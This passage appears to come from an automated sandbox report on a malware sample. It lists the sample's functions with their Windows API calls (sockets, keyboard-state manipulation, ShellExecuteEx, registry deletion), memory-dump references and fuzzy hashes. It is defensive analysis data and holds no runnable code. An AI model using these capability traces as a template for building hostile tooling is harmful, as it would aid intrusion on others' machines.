                                                                            Function 002E71EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002E72EB
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002E730C
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E731F
                                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 002E73D5
                                                                            • inet_ntoa.WSOCK32(?), ref: 002E7392
                                                                              • Part of subcall function 002CB4EA: _strlen.LIBCMT ref: 002CB4F4
                                                                              • Part of subcall function 002CB4EA: _memmove.LIBCMT ref: 002CB516
                                                                            • _strlen.LIBCMT ref: 002E742F
                                                                            • _memmove.LIBCMT ref: 002E7498
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 3619996494-0
                                                                            • Opcode ID: 2dc88fcb6823076c53b302fd3d1216527fad5933435b73cee16d754518d01e74
                                                                            • Instruction ID: 2076a7a379a536385ab6d5a1693b1edcc5bb1772d2c6c3a37705cdea3b870518
                                                                            • Opcode Fuzzy Hash: 2dc88fcb6823076c53b302fd3d1216527fad5933435b73cee16d754518d01e74
                                                                            • Instruction Fuzzy Hash: 1B81F071128240ABC710EF25CC91F6BB7B8AF84714F50851DF9499B2D2EB70DD21CB92
                                                                            Function 00271800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b46d4c785e22cf0954ae6834f5b7034022a2e7ed0e1fcf408ab0377ce9a2677
                                                                            • Instruction ID: b3652c517290d7b979305795b7e44ef13ebd431c8abbaa5e226e1583b2ff7c47
                                                                            • Opcode Fuzzy Hash: 1b46d4c785e22cf0954ae6834f5b7034022a2e7ed0e1fcf408ab0377ce9a2677
                                                                            • Instruction Fuzzy Hash: BB715E3492010AEFDB09CF58CC45ABEBB79FF86314F14C159F919AA251C770AA61CFA1
                                                                            Function 002FB9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00C65698), ref: 002FBA5D
                                                                            • IsWindowEnabled.USER32(00C65698), ref: 002FBA69
                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 002FBB4D
                                                                            • SendMessageW.USER32(00C65698,000000B0,?,?), ref: 002FBB84
                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 002FBBC1
                                                                            • GetWindowLongW.USER32(00C65698,000000EC), ref: 002FBBE3
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002FBBFB
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                            • String ID:
                                                                            • API String ID: 4072528602-0
                                                                            • Opcode ID: 28b7a3f47fefbc6ed678e8a1e5ab7b7674d6d1962f2d8701b94f9191ee2a9e0a
                                                                            • Instruction ID: 283f5ed78af104ccfe40efe27fbd0c1fe64c053962f31fbf694fe09be756a220
                                                                            • Opcode Fuzzy Hash: 28b7a3f47fefbc6ed678e8a1e5ab7b7674d6d1962f2d8701b94f9191ee2a9e0a
                                                                            • Instruction Fuzzy Hash: 8D71B038A1520EAFDB279F54C8D4FBAF7B9EF49380F144069EA5597261CB31AC60CB50
                                                                            Function 002EFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002EFB31
                                                                            • _memset.LIBCMT ref: 002EFBFA
                                                                            • ShellExecuteExW.SHELL32(?), ref: 002EFC3F
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                              • Part of subcall function 0028436A: _wcscpy.LIBCMT ref: 0028438D
                                                                            • GetProcessId.KERNEL32(00000000), ref: 002EFCB6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002EFCE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                            • String ID: @
                                                                            • API String ID: 3522835683-2766056989
                                                                            • Opcode ID: 01130f6f4c4bed5cae3e1b81368a0805a77be7a14fa7dd0b38d0b2765e1baeb9
                                                                            • Instruction ID: 9f3c2d991d783e148e44f652fbf53c753edbf80bcfc9262d56df28e562c702a5
                                                                            • Opcode Fuzzy Hash: 01130f6f4c4bed5cae3e1b81368a0805a77be7a14fa7dd0b38d0b2765e1baeb9
                                                                            • Instruction Fuzzy Hash: 6A61D275A10619DFCB15EF95C590AAEB7F4FF08314F20846AE849AB391CB30AD61CF90
                                                                            Function 002D174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 002D178B
                                                                            • GetKeyboardState.USER32(?), ref: 002D17A0
                                                                            • SetKeyboardState.USER32(?), ref: 002D1801
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 002D182F
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 002D184E
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 002D1894
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002D18B7
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 64e58421cac8ce27dedb9b52db5cea4f618150782298bf6556d6215815b64bf6
                                                                            • Instruction ID: 502b80ec4c25496abf3928682d6277febaeee05f8b5015d2bf4c4840e2e458f7
                                                                            • Opcode Fuzzy Hash: 64e58421cac8ce27dedb9b52db5cea4f618150782298bf6556d6215815b64bf6
                                                                            • Instruction Fuzzy Hash: 6F51D5A0A287D63DFB368A34CC55BB6BEE95B06300F08458AE0D586ED2C3949CF4E750
                                                                            Function 002D1565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 002D15A4
                                                                            • GetKeyboardState.USER32(?), ref: 002D15B9
                                                                            • SetKeyboardState.USER32(?), ref: 002D161A
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002D1646
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002D1663
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002D16A7
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002D16C8
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: d597189aee0fcba1ed8fee01a7f9efde4ba3926e09e87d634d7be2d765a19deb
                                                                            • Instruction ID: e02a1538c02bed12f3052e87822a88b3866754f6d12c6cfa526cb98749d6b922
                                                                            • Opcode Fuzzy Hash: d597189aee0fcba1ed8fee01a7f9efde4ba3926e09e87d634d7be2d765a19deb
                                                                            • Instruction Fuzzy Hash: 395118A05687D63DFB368B248C51B7ABEAD5B06300F0C848BE0D546EC2C694ECB4D790
                                                                            Function 002D5BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsncpy$LocalTime
                                                                            • String ID:
                                                                            • API String ID: 2945705084-0
                                                                            • Opcode ID: a82dda0b28188212f0bd710f0db894837ba609a4426f353092e1296ba890341d
                                                                            • Instruction ID: 09539dc9f81157aaa1368592fc58c9634e21b692b2b9d9fea2ab2da0f3ef8d38
                                                                            • Opcode Fuzzy Hash: a82dda0b28188212f0bd710f0db894837ba609a4426f353092e1296ba890341d
                                                                            • Instruction Fuzzy Hash: 7D417065C3062875CF11FBF48886ACFB7BDAF04310F518856E909E3211E674A6298BA6
                                                                            Function 002D3B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002D3B8A,?), ref: 002D4BE0
                                                                              • Part of subcall function 002D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002D3B8A,?), ref: 002D4BF9
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 002D3BAA
                                                                            • _wcscmp.LIBCMT ref: 002D3BC6
                                                                            • MoveFileW.KERNEL32(?,?), ref: 002D3BDE
                                                                            • _wcscat.LIBCMT ref: 002D3C26
                                                                            • SHFileOperationW.SHELL32(?), ref: 002D3C92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 1377345388-1173974218
                                                                            • Opcode ID: bc890f6a978de08a60a45f5ef9ebe818a2e890e3383b0f0ae289ec531f13d4a6
                                                                            • Instruction ID: d53b8ee400cac33827c20f10943d53b1f305b3cc7df17b9b69c3d17aa185609e
                                                                            • Opcode Fuzzy Hash: bc890f6a978de08a60a45f5ef9ebe818a2e890e3383b0f0ae289ec531f13d4a6
                                                                            • Instruction Fuzzy Hash: E7416D71528345AAC756EF64D481ADBB7ECAF88340F40092FF489D3291EB34DA588B52
                                                                            Function 002F78B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002F78CF
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F7976
                                                                            • IsMenu.USER32(?), ref: 002F798E
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002F79D6
                                                                            • DrawMenuBar.USER32 ref: 002F79E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                            • String ID: 0
                                                                            • API String ID: 3866635326-4108050209
                                                                            • Opcode ID: 1244e2dd5f2e3d3e27a1bc5ca52f2fe49068ee7587b40348c874392d8a347224
                                                                            • Instruction ID: 3d6e7f155813ea318501c0ef39dcee5a82c297d484897291b061a2a368024e43
                                                                            • Opcode Fuzzy Hash: 1244e2dd5f2e3d3e27a1bc5ca52f2fe49068ee7587b40348c874392d8a347224
                                                                            • Instruction Fuzzy Hash: FF412C75A18209EFDB20DF54D884EEABBF9FB05350F04812DEA559B250D7B0AD60CF90
                                                                            Function 002F1602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002F1631
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002F165B
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 002F1712
                                                                              • Part of subcall function 002F1602: RegCloseKey.ADVAPI32(?), ref: 002F1678
                                                                              • Part of subcall function 002F1602: FreeLibrary.KERNEL32(?), ref: 002F16CA
                                                                              • Part of subcall function 002F1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002F16ED
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 002F16B5
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 395352322-0
                                                                            • Opcode ID: 7e6846f944bb977de0087ec08b84d081b69e8f33ca02b7f5959d6de2b0a643a0
                                                                            • Instruction ID: 6e0debff0bf987895d1fc024326944d52acc2b8fdaf2a061bf59aa8eeeb8c966
                                                                            • Opcode Fuzzy Hash: 7e6846f944bb977de0087ec08b84d081b69e8f33ca02b7f5959d6de2b0a643a0
                                                                            • Instruction Fuzzy Hash: D7313B7191110DFFEB159F94DC95AFEF7BCEB08340F40016AE606E2140EB709E659AA0
                                                                            Function 002F68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002F6911
                                                                            • GetWindowLongW.USER32(00C65698,000000F0), ref: 002F6944
                                                                            • GetWindowLongW.USER32(00C65698,000000F0), ref: 002F6979
                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002F69AB
                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002F69D5
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002F69E6
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002F6A00
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            • Opcode ID: ec7c615e5b54fa04ed616e7a232ed493cc65a75c780757286928c5c417b9124a
                                                                            • Instruction ID: be02dd0fd58732e54127824400fff0fa09bc9159f69b522549faf26efdb82e96
                                                                            • Opcode Fuzzy Hash: ec7c615e5b54fa04ed616e7a232ed493cc65a75c780757286928c5c417b9124a
                                                                            • Instruction Fuzzy Hash: C531487061415AAFDB22CF58DC99F6477E9FB49790F1801A4F6148F2B1CBB2AC60DB40
                                                                            Function 002CE287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002CE2CA
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002CE2F0
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 002CE2F3
                                                                            • SysAllocString.OLEAUT32(?), ref: 002CE311
                                                                            • SysFreeString.OLEAUT32(?), ref: 002CE31A
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 002CE33F
                                                                            • SysAllocString.OLEAUT32(?), ref: 002CE34D
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: ed2c7148c9d13060aef4f911c4b1c8896445076572da239b7124938a7e9cabc9
                                                                            • Instruction ID: 8d7ff10daf9c8d610451ee8ede4d4381d728f761722721b4237acb47496bf377
                                                                            • Opcode Fuzzy Hash: ed2c7148c9d13060aef4f911c4b1c8896445076572da239b7124938a7e9cabc9
                                                                            • Instruction Fuzzy Hash: 6B21BA35611109AFDF10DFA9CC88EBB77ACEB08360F054169FD14DB250DA70AC418B64
                                                                            Function 002E685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002E84A0
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002E68B1
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E68C0
                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002E68F9
                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 002E6902
                                                                            • WSAGetLastError.WSOCK32 ref: 002E690C
                                                                            • closesocket.WSOCK32(00000000), ref: 002E6935
                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002E694E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 910771015-0
                                                                            • Opcode ID: 7cb3939df1796f4885aa5b4007593c98a6bad4458b5da2d256d2e95aab996202
                                                                            • Instruction ID: 95de2a2ca1dff542393dae2fae234d22a0883185323eeae6ef84937c2e8c271c
                                                                            • Opcode Fuzzy Hash: 7cb3939df1796f4885aa5b4007593c98a6bad4458b5da2d256d2e95aab996202
                                                                            • Instruction Fuzzy Hash: 7631E771250208AFDB10AF65CC89FBE77BDEB44760F448019FD49A7291CB74AC148FA1
                                                                            Function 002CE360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002CE3A5
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002CE3CB
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 002CE3CE
                                                                            • SysAllocString.OLEAUT32 ref: 002CE3EF
                                                                            • SysFreeString.OLEAUT32 ref: 002CE3F8
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 002CE412
                                                                            • SysAllocString.OLEAUT32(?), ref: 002CE420
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 16d85a48a6720e82389c35fb33e203894c5644f4227b68ef1615e0daa9474445
                                                                            • Instruction ID: 175281472fbae0acea4c18b3f7c7ffdc649150754e88f229d8507b4bb183cecf
                                                                            • Opcode Fuzzy Hash: 16d85a48a6720e82389c35fb33e203894c5644f4227b68ef1615e0daa9474445
                                                                            • Instruction Fuzzy Hash: 04218835615105AFDF249FA9DC88EBF77ECEB08360F01822AF915CB260DA74EC518B64
                                                                            Function 002F7BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00272111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0027214F
